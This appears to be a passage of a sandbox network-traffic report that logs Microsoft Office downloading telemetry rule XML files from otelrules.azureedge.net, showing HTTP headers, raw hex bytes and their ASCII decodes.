                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Insights.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenI


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            63192.168.2.44982313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                            x-ms-request-id: 9563ae3e-601e-0084-6b86-366b3f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120234Z-r178fb8d765z9wvrhC1DFW1a0s00000000m0000000008n5k
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC192OUTGET /rules/rule700700v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEDD5ABCF"
                                                                                                                                                                                                                                            x-ms-request-id: 91c87805-901e-0064-2d8b-35e8a6000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120258Z-1749fc9bdbd85qw2hC1DFW157000000002f000000000dv7f
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 49 64 65 6e 74 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700700" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Identity" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenIdentity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            64192.168.2.44982213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                            x-ms-request-id: aa5f00e8-901e-0029-53a0-34274a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120234Z-r178fb8d765d5f82hC1DFWsrm800000002n0000000005rqa
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC192OUTGET /rules/rule700701v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE0D532BE"
                                                                                                                                                                                                                                            x-ms-request-id: 843cfb74-a01e-003d-01d3-2b98d7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120258Z-16547b76f7ftdm8dhC1DFWs13g0000000kg000000000bm70
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 49
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700701" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Identity.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenI


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            65192.168.2.44982113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                            x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120234Z-16547b76f7fm7xw6hC1DFW5px40000000kmg000000001vc3
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:34 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC192OUTGET /rules/rule702050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:58 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDBE82B5E"
                                                                                                                                                                                                                                            x-ms-request-id: b7c482e8-e01e-00aa-2c40-36ceda000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120258Z-1749fc9bdbdns7kfhC1DFWb6c400000002eg00000000dqkp
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:58 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 49 6e 73 69 67 68 74 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 49 6e 73 69 67 68 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Insights" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenInsights" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            66192.168.2.44982413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                                            x-ms-request-id: cb3a3330-101e-0017-3e89-3647c7000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120235Z-r178fb8d765z9wvrhC1DFW1a0s00000000mg000000006zps
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            67192.168.2.44982613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                            x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120235Z-16547b76f7fj897nhC1DFWdwq40000000kk0000000000fr5
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            68192.168.2.44982513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                            x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120235Z-16547b76f7fmbrhqhC1DFWkds80000000kpg0000000062w9
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            69192.168.2.44982713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 491
